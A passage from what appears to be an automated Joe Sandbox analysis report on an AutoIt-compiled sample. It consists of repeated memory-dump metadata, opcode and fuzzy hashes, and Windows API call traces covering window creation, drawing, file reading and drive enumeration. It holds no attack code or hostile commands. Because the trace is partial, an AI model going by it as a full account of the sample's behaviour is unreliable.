                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e23dacf27165171d2c4ee72a24792b2f1198dc694be9ef862c24ac284ddb2247
                                        • Instruction ID: 9e73274fac0edd60eebe2d0a0ac21647be87ce2f770f34a8c107b82b89e94f27
                                        • Opcode Fuzzy Hash: e23dacf27165171d2c4ee72a24792b2f1198dc694be9ef862c24ac284ddb2247
                                        • Instruction Fuzzy Hash: 2261347120C709A7DE349A2889A5BFE23B4DF43700F241B1AE863DB281DB119FC6B355
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5a3f61fc25a6edd9a698cd4afdffde0ed26418edde8e5980f49c1811f85568e7
                                        • Instruction ID: b8daf7006399b45759c2bf5be6a70316bcd0cfef343ea67916ea4d2b351b5689
                                        • Opcode Fuzzy Hash: 5a3f61fc25a6edd9a698cd4afdffde0ed26418edde8e5980f49c1811f85568e7
                                        • Instruction Fuzzy Hash: B161497160C70D5BDE386A286895BFE23F49F43704F200B59E953DB281DA12EFC6B255
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction ID: 37768e7391cccd23d7fe85f524f5861d594679898737d4c2f20053da99c20799
                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction Fuzzy Hash: 7B8178325090A349EB5D463A85340BEFFE15A933A171E479DD9F2CA2C1EE18C794F660
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b580a00814184c35eb9796c100e22f4f5d0e5784cd38ee70b6daccc9fe79c2ec
                                        • Instruction ID: ee76b5bfb956ed5996050a8c2d52ae830f1f6e04cac9056382c7c0680cbe7e2b
                                        • Opcode Fuzzy Hash: b580a00814184c35eb9796c100e22f4f5d0e5784cd38ee70b6daccc9fe79c2ec
                                        • Instruction Fuzzy Hash: 2E21A5326206158BDB28CF79C862B7E73E5A754310F15862EE4A7C37D0DE39A904DB90
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 00C72B30
                                        • DeleteObject.GDI32(00000000), ref: 00C72B43
                                        • DestroyWindow.USER32 ref: 00C72B52
                                        • GetDesktopWindow.USER32 ref: 00C72B6D
                                        • GetWindowRect.USER32(00000000), ref: 00C72B74
                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00C72CA3
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C72CB1
                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72CF8
                                        • GetClientRect.USER32(00000000,?), ref: 00C72D04
                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C72D40
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72D62
                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72D75
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72D80
                                        • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72D89
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72D98
                                        • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72DA1
                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72DA8
                                        • GlobalFree.KERNEL32(00000000), ref: 00C72DB3
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72DC5
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C8FC38,00000000), ref: 00C72DDB
                                        • GlobalFree.KERNEL32(00000000), ref: 00C72DEB
                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00C72E11
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C72E30
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72E52
                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C7303F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                        • String ID: $AutoIt v3$DISPLAY$static
                                        • API String ID: 2211948467-2373415609
                                        • Opcode ID: 2aec5d9c2ab69df65843c72acf4b5770921f16022128ef7cd2bda074f2fb6d08
                                        • Instruction ID: 7d2012595850cf5e4bb3d818c5e4189fa8adebb0b0440e3a3a3ba235813ce82e
                                        • Opcode Fuzzy Hash: 2aec5d9c2ab69df65843c72acf4b5770921f16022128ef7cd2bda074f2fb6d08
                                        • Instruction Fuzzy Hash: 47027971900218AFDB14DFA4CC89FAE7BB9EF49714F048158F919AB2A1DB74ED01CB64
                                        APIs
                                        • SetTextColor.GDI32(?,00000000), ref: 00C8712F
                                        • GetSysColorBrush.USER32(0000000F), ref: 00C87160
                                        • GetSysColor.USER32(0000000F), ref: 00C8716C
                                        • SetBkColor.GDI32(?,000000FF), ref: 00C87186
                                        • SelectObject.GDI32(?,?), ref: 00C87195
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00C871C0
                                        • GetSysColor.USER32(00000010), ref: 00C871C8
                                        • CreateSolidBrush.GDI32(00000000), ref: 00C871CF
                                        • FrameRect.USER32(?,?,00000000), ref: 00C871DE
                                        • DeleteObject.GDI32(00000000), ref: 00C871E5
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00C87230
                                        • FillRect.USER32(?,?,?), ref: 00C87262
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C87284
                                          • Part of subcall function 00C873E8: GetSysColor.USER32(00000012), ref: 00C87421
                                          • Part of subcall function 00C873E8: SetTextColor.GDI32(?,?), ref: 00C87425
                                          • Part of subcall function 00C873E8: GetSysColorBrush.USER32(0000000F), ref: 00C8743B
                                          • Part of subcall function 00C873E8: GetSysColor.USER32(0000000F), ref: 00C87446
                                          • Part of subcall function 00C873E8: GetSysColor.USER32(00000011), ref: 00C87463
                                          • Part of subcall function 00C873E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C87471
                                          • Part of subcall function 00C873E8: SelectObject.GDI32(?,00000000), ref: 00C87482
                                          • Part of subcall function 00C873E8: SetBkColor.GDI32(?,00000000), ref: 00C8748B
                                          • Part of subcall function 00C873E8: SelectObject.GDI32(?,?), ref: 00C87498
                                          • Part of subcall function 00C873E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00C874B7
                                          • Part of subcall function 00C873E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C874CE
                                          • Part of subcall function 00C873E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00C874DB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                        • String ID:
                                        • API String ID: 4124339563-0
                                        • Opcode ID: 8a686dd3d71ba86a2674afb4cee84a5adc6eb94035547783d2255cdf59b7ff4d
                                        • Instruction ID: 333c224bf820190f4c7444a15bc1498728d982810d369a1f6528981beed64b91
                                        • Opcode Fuzzy Hash: 8a686dd3d71ba86a2674afb4cee84a5adc6eb94035547783d2255cdf59b7ff4d
                                        • Instruction Fuzzy Hash: 02A18172008301EFDB10AF64DC88B5F7BA9FB49324F200B19F962961E1E775E944DB65
                                        APIs
                                        • DestroyWindow.USER32(?,?), ref: 00C08E14
                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C46AC5
                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C46AFE
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C46F43
                                          • Part of subcall function 00C08F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C08BE8,?,00000000,?,?,?,?,00C08BBA,00000000,?), ref: 00C08FC5
                                        • SendMessageW.USER32(?,00001053), ref: 00C46F7F
                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C46F96
                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C46FAC
                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C46FB7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                        • String ID: 0
                                        • API String ID: 2760611726-4108050209
                                        • Opcode ID: 43c8ee6d94896935c709d10727ee2485124ccce7b7b8d160d7526236495c801b
                                        • Instruction ID: f514f92359aaf8fa141dc32bd9e5c03cc100cebb2188aa9b9d0d1beee47694ea
                                        • Opcode Fuzzy Hash: 43c8ee6d94896935c709d10727ee2485124ccce7b7b8d160d7526236495c801b
                                        • Instruction Fuzzy Hash: EF12DD34600201DFDB25CF24C884BAABBE5FB46710F188469F5A5CB2A6CB31ED55DB92
                                        APIs
                                        • DestroyWindow.USER32(00000000), ref: 00C7273E
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C7286A
                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00C728A9
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C728B9
                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00C72900
                                        • GetClientRect.USER32(00000000,?), ref: 00C7290C
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00C72955
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C72964
                                        • GetStockObject.GDI32(00000011), ref: 00C72974
                                        • SelectObject.GDI32(00000000,00000000), ref: 00C72978
                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C72988
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C72991
                                        • DeleteDC.GDI32(00000000), ref: 00C7299A
                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C729C6
                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C729DD
                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00C72A1D
                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C72A31
                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C72A42
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00C72A77
                                        • GetStockObject.GDI32(00000011), ref: 00C72A82
                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C72A8D
                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C72A97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                        • API String ID: 2910397461-517079104
                                        • Opcode ID: 1fac5c41d10dbf70afe5d83f1406db40967567872543af1ab3a18388fe99deb8
                                        • Instruction ID: d0b9bc6da7cde7ba4193814c677824e937a723f04a8e4b2b027af4cb98472a60
                                        • Opcode Fuzzy Hash: 1fac5c41d10dbf70afe5d83f1406db40967567872543af1ab3a18388fe99deb8
                                        • Instruction Fuzzy Hash: A2B17E71A00209AFEB14DF69CD89FAE7BB9EB08714F048154FA15E72A1D774ED40CBA4
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00C64AED
                                        • GetDriveTypeW.KERNEL32(?,00C8CB68,?,\\.\,00C8CC08), ref: 00C64BCA
                                        • SetErrorMode.KERNEL32(00000000,00C8CB68,?,\\.\,00C8CC08), ref: 00C64D36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DriveType
                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                        • API String ID: 2907320926-4222207086
                                        • Opcode ID: 19e146a3ec71113f361b07679f9c113c9f333cc880fd5f4b30defcf691b21bd8
                                        • Instruction ID: 691cec61ee88a9d2e1a8fcc5cbf583cf566f80149302400a1b7c7e07e0ad13fc
                                        • Opcode Fuzzy Hash: 19e146a3ec71113f361b07679f9c113c9f333cc880fd5f4b30defcf691b21bd8
                                        • Instruction Fuzzy Hash: 9861B07060520AEBCB28DF29CAC19BDBBA0EF44740F244465F806AB791DB39EE45DB51
                                        APIs
                                        • GetSysColor.USER32(00000012), ref: 00C87421
                                        • SetTextColor.GDI32(?,?), ref: 00C87425
                                        • GetSysColorBrush.USER32(0000000F), ref: 00C8743B
                                        • GetSysColor.USER32(0000000F), ref: 00C87446
                                        • CreateSolidBrush.GDI32(?), ref: 00C8744B
                                        • GetSysColor.USER32(00000011), ref: 00C87463
                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C87471
                                        • SelectObject.GDI32(?,00000000), ref: 00C87482
                                        • SetBkColor.GDI32(?,00000000), ref: 00C8748B
                                        • SelectObject.GDI32(?,?), ref: 00C87498
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00C874B7
                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C874CE
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00C874DB
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C8752A
                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C87554
                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00C87572
                                        • DrawFocusRect.USER32(?,?), ref: 00C8757D
                                        • GetSysColor.USER32(00000011), ref: 00C8758E
                                        • SetTextColor.GDI32(?,00000000), ref: 00C87596
                                        • DrawTextW.USER32(?,00C870F5,000000FF,?,00000000), ref: 00C875A8
                                        • SelectObject.GDI32(?,?), ref: 00C875BF
                                        • DeleteObject.GDI32(?), ref: 00C875CA
                                        • SelectObject.GDI32(?,?), ref: 00C875D0
                                        • DeleteObject.GDI32(?), ref: 00C875D5
                                        • SetTextColor.GDI32(?,?), ref: 00C875DB
                                        • SetBkColor.GDI32(?,?), ref: 00C875E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 1996641542-0
                                        • Opcode ID: d5eb045dd39cc00d8030ce1815ac9b5d744b72a1a14ad42b1cff9f4bcef73575
                                        • Instruction ID: d9344df695afc43b3922c7191bc0ccfd2aac07c7dafbb8c3062e6d7f621118ea
                                        • Opcode Fuzzy Hash: d5eb045dd39cc00d8030ce1815ac9b5d744b72a1a14ad42b1cff9f4bcef73575
                                        • Instruction Fuzzy Hash: D2615072900218AFDF119FA4DC89FAE7F79EB08320F214215F915AB2A1D7749940DFA4
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00C81128
                                        • GetDesktopWindow.USER32 ref: 00C8113D
                                        • GetWindowRect.USER32(00000000), ref: 00C81144
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C81199
                                        • DestroyWindow.USER32(?), ref: 00C811B9
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C811ED
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C8120B
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C8121D
                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 00C81232
                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00C81245
                                        • IsWindowVisible.USER32(00000000), ref: 00C812A1
                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00C812BC
                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00C812D0
                                        • GetWindowRect.USER32(00000000,?), ref: 00C812E8
                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00C8130E
                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00C81328
                                        • CopyRect.USER32(?,?), ref: 00C8133F
                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 00C813AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                        • String ID: ($0$tooltips_class32
                                        • API String ID: 698492251-4156429822
                                        • Opcode ID: c8a351867e9a93138d9d9a75bf85d89933862534889f17e32f381d518f5987c3
                                        • Instruction ID: 4b44a92e17c596aa899034c70af5dd8bc0129848722e7df117714ac77cd79be4
                                        • Opcode Fuzzy Hash: c8a351867e9a93138d9d9a75bf85d89933862534889f17e32f381d518f5987c3
                                        • Instruction Fuzzy Hash: D6B19C71608341AFD700EF64C884B6EBBE8FF84354F04895CF9999B2A1D731E949CBA5
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00C802E5
                                        • _wcslen.LIBCMT ref: 00C8031F
                                        • _wcslen.LIBCMT ref: 00C80389
                                        • _wcslen.LIBCMT ref: 00C803F1
                                        • _wcslen.LIBCMT ref: 00C80475
                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C804C5
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C80504
                                          • Part of subcall function 00C0F9F2: _wcslen.LIBCMT ref: 00C0F9FD
                                          • Part of subcall function 00C5223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C52258
                                          • Part of subcall function 00C5223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C5228A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                        • API String ID: 1103490817-719923060
                                        • Opcode ID: 728f1676e49a929b187cea98dcaff0cc4e85c30c6642f1126c58749f63038bf7
                                        • Instruction ID: e81a643a4e1bafeeabfdbf0c7ced50310fb827edf89d84c74c04eb3efc496f7e
                                        • Opcode Fuzzy Hash: 728f1676e49a929b187cea98dcaff0cc4e85c30c6642f1126c58749f63038bf7
                                        • Instruction Fuzzy Hash: 25E1B1312082018FC754EF24C55197EB7E6BFD8318F244A6CF8A69B2A1DB30EE49CB55
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C08968
                                        • GetSystemMetrics.USER32(00000007), ref: 00C08970
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C0899B
                                        • GetSystemMetrics.USER32(00000008), ref: 00C089A3
                                        • GetSystemMetrics.USER32(00000004), ref: 00C089C8
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C089E5
                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C089F5
                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C08A28
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C08A3C
                                        • GetClientRect.USER32(00000000,000000FF), ref: 00C08A5A
